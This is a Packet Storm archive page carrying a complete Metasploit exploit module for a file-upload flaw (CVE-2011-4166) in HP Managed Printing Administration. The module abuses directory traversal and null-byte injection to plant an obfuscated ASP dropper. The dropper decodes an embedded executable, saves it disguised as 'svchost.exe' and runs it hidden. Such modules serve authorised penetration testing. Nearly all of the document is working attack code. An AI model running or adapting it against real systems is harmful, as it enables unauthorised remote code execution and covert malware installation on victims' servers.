what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP Managed Printing Administration jobAcct Remote Command Execution

HP Managed Printing Administration jobAcct Remote Command Execution
Posted Jul 18, 2013
Authored by Andrea Micalizzi, juan vazquez | Site metasploit.com

This Metasploit module exploits an arbitrary file upload vulnerability on HP Managed Printing Administration 2.6.3 (and before). The vulnerability exists in the UploadFiles() function from the MPAUploader.Uploader.1 control, loaded and used by the server. The function can be abused via directory traversal and null byte injection in order to achieve arbitrary file upload.

tags | exploit, arbitrary, file upload
advisories | CVE-2011-4166, OSVDB-78015
SHA-256 | 6b9c2fdb66e0b18c5c373af45ca8b8d1347dba271986c98d13999847c6f76701

HP Managed Printing Administration jobAcct Remote Command Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize
super(
'Name' => 'HP Managed Printing Administration jobAcct Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability on HP Managed Printing
Administration 2.6.3 (and before). The vulnerability exists in the UploadFiles()
function from the MPAUploader.Uploader.1 control, loaded and used by the server.
The function can be abused via directory traversal and null byte injection in order
to achieve arbitrary file upload. In order to exploit successfully, a few conditions
must be met: 1) A writable location under the context of Internet Guest Account
(IUSR_*), or Everyone is required. By default, this module will attempt to write to
/hpmpa/userfiles/, but you may specify the WRITEWEBFOLDER datastore option to provide
another writable path. 2) The writable path must also be readable by a browser,
this typically means a location under wwwroot. 3) You cannot overwrite a file with
the same name as the payload.
},
'Author' => [
'Andrea Micalizzi', # aka rgod - Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'Platform' => 'win',
'References' =>
[
['CVE', '2011-4166'],
['OSVDB', '78015'],
['BID', '51174'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-352/'],
['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469']
],
'Targets' =>
[
[ 'HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]', { } ],
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Dec 21 2011'
)

register_options(
[
OptString.new('WRITEWEBFOLDER', [ false, "Additional Web location with file write permissions for IUSR_*" ])
], self.class)
end

def peer
return "#{rhost}:#{rport}"
end

def webfolder_uri
begin
u = datastore['WRITEWEBFOLDER']
u = "/" if u.nil? or u.empty?
URI(u).to_s
rescue ::URI::InvalidURIError
print_error "Invalid URI: #{datastore['WRITEWEBFOLDER'].inspect}"
return "/"
end
end

def to_exe_asp(exes = '')

var_func = Rex::Text.rand_text_alpha(rand(8)+8)
var_stream = Rex::Text.rand_text_alpha(rand(8)+8)
var_obj = Rex::Text.rand_text_alpha(rand(8)+8)
var_shell = Rex::Text.rand_text_alpha(rand(8)+8)
var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)
var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)
var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)

var_f64name = Rex::Text.rand_text_alpha(rand(8)+8)
arg_b64string = Rex::Text.rand_text_alpha(rand(8)+8)
var_length = Rex::Text.rand_text_alpha(rand(8)+8)
var_out = Rex::Text.rand_text_alpha(rand(8)+8)
var_group = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
var_char = Rex::Text.rand_text_alpha(rand(8)+8)
var_thisdata = Rex::Text.rand_text_alpha(rand(8)+8)
const_base64 = Rex::Text.rand_text_alpha(rand(8)+8)
var_ngroup = Rex::Text.rand_text_alpha(rand(8)+8)
var_pout = Rex::Text.rand_text_alpha(rand(8)+8)

vbs = "<%\r\n"

# ASP Base64 decode from Antonin Foller http://www.motobit.com/tips/detpg_base64/
vbs << "Function #{var_f64name}(ByVal #{arg_b64string})\r\n"
vbs << "Const #{const_base64} = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n"
vbs << "Dim #{var_length}, #{var_out}, #{var_group}\r\n"
vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbCrLf, \"\")\r\n"
vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbTab, \"\")\r\n"
vbs << "#{arg_b64string} = Replace(#{arg_b64string}, \" \", \"\")\r\n"
vbs << "#{var_length} = Len(#{arg_b64string})\r\n"
vbs << "If #{var_length} Mod 4 <> 0 Then\r\n"
vbs << "Exit Function\r\n"
vbs << "End If\r\n"
vbs << "For #{var_group} = 1 To #{var_length} Step 4\r\n"
vbs << "Dim #{var_bytes}, #{var_counter}, #{var_char}, #{var_thisdata}, #{var_ngroup}, #{var_pout}\r\n"
vbs << "#{var_bytes} = 3\r\n"
vbs << "#{var_ngroup} = 0\r\n"
vbs << "For #{var_counter} = 0 To 3\r\n"
vbs << "#{var_char} = Mid(#{arg_b64string}, #{var_group} + #{var_counter}, 1)\r\n"
vbs << "If #{var_char} = \"=\" Then\r\n"
vbs << "#{var_bytes} = #{var_bytes} - 1\r\n"
vbs << "#{var_thisdata} = 0\r\n"
vbs << "Else\r\n"
vbs << "#{var_thisdata} = InStr(1, #{const_base64}, #{var_char}, vbBinaryCompare) - 1\r\n"
vbs << "End If\r\n"
vbs << "If #{var_thisdata} = -1 Then\r\n"
vbs << "Exit Function\r\n"
vbs << "End If\r\n"
vbs << "#{var_ngroup} = 64 * #{var_ngroup} + #{var_thisdata}\r\n"
vbs << "Next\r\n"
vbs << "#{var_ngroup} = Hex(#{var_ngroup})\r\n"
vbs << "#{var_ngroup} = String(6 - Len(#{var_ngroup}), \"0\") & #{var_ngroup}\r\n"
vbs << "#{var_pout} = Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 1, 2))) + _\r\n"
vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 3, 2))) + _\r\n"
vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 5, 2)))\r\n"
vbs << "#{var_out} = #{var_out} & Left(#{var_pout}, #{var_bytes})\r\n"
vbs << "Next\r\n"
vbs << "#{var_f64name} = #{var_out}\r\n"
vbs << "End Function\r\n"

vbs << "Sub #{var_func}()\r\n"
vbs << "#{var_bytes} = #{var_f64name}(\"#{Rex::Text.encode_base64(exes)}\")\r\n"
vbs << "Dim #{var_obj}\r\n"
vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
vbs << "Dim #{var_stream}\r\n"
vbs << "Dim #{var_tempdir}\r\n"
vbs << "Dim #{var_tempexe}\r\n"
vbs << "Dim #{var_basedir}\r\n"
vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"

vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
vbs << "#{var_stream}.Write #{var_bytes}\r\n"
vbs << "#{var_stream}.Close\r\n"
vbs << "Dim #{var_shell}\r\n"
vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"

vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n"
vbs << "End Sub\r\n"

vbs << "#{var_func}\r\n"
vbs << "%>\r\n"
vbs
end

def upload(contents, location)
post_data = Rex::MIME::Message.new
post_data.add_part("upload", nil, nil, "form-data; name=\"upload\"")
post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"..\\../../wwwroot#{location}\x00.tmp\"")
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

res = send_request_cgi({
'uri' => normalize_uri("hpmpa", "jobAcct", "Default.asp"),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => data,
'encode_params' => false,
'vars_get' => {
'userId' => rand_text_numeric(2+rand(2)),
'jobId' => rand_text_numeric(2+rand(2))
}
})
return res
end

def check
res = send_request_cgi({'uri' => normalize_uri("hpmpa", "home", "Default.asp")})
version = nil
if res and res.code == 200 and res.body =~ /HP Managed Printing Administration/ and res.body =~ /<dd>v(.*)<\/dd>/
version = $1
else
return Exploit::CheckCode::Safe
end

vprint_status("HP MPA Version Detected: #{version}")

if version <= "2.6.3"
return Exploit::CheckCode::Appears
end

return Exploit::CheckCode::Safe

end

def exploit
# Generate the ASP containing the EXE containing the payload
exe = generate_payload_exe
# Not using Msf::Util::EXE.to_exe_asp because the generated vbs is too long and the app complains
asp = to_exe_asp(exe)

#
# UPLOAD
#
asp_name = "#{rand_text_alpha(5+rand(3))}.asp"
locations = [
"/hpmpa/userfiles/images/printers/",
"/hpmpa/userfiles/images/backgrounds/",
"/hpmpa/userfiles/images/",
"/hpmpa/userfiles/",
"/"
]

locations << normalize_uri(webfolder_uri, asp_name) if datastore['WRITEWEBFOLDER']

payload_url = ""

locations.each {|location|
asp_location = location + asp_name
print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...")
res = upload(asp, asp_location)
if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/
print_good("#{peer} - ASP Payload successfully wrote to #{location}")
payload_url = asp_location
break
elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/
print_error("#{peer} - Error probably due to permissions while writing to #{location}")
else
print_error("#{peer} - Unknown error while while writing to #{location}")
end
}

if payload_url.empty?
fail_with(Exploit::Failure::NotVulnerable, "#{peer} - Failed to upload ASP payload to the target")
end

#
# EXECUTE
#
print_status("#{peer} - Executing payload through #{payload_url}...")
send_request_cgi({ 'uri' => payload_url})
end

end

Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close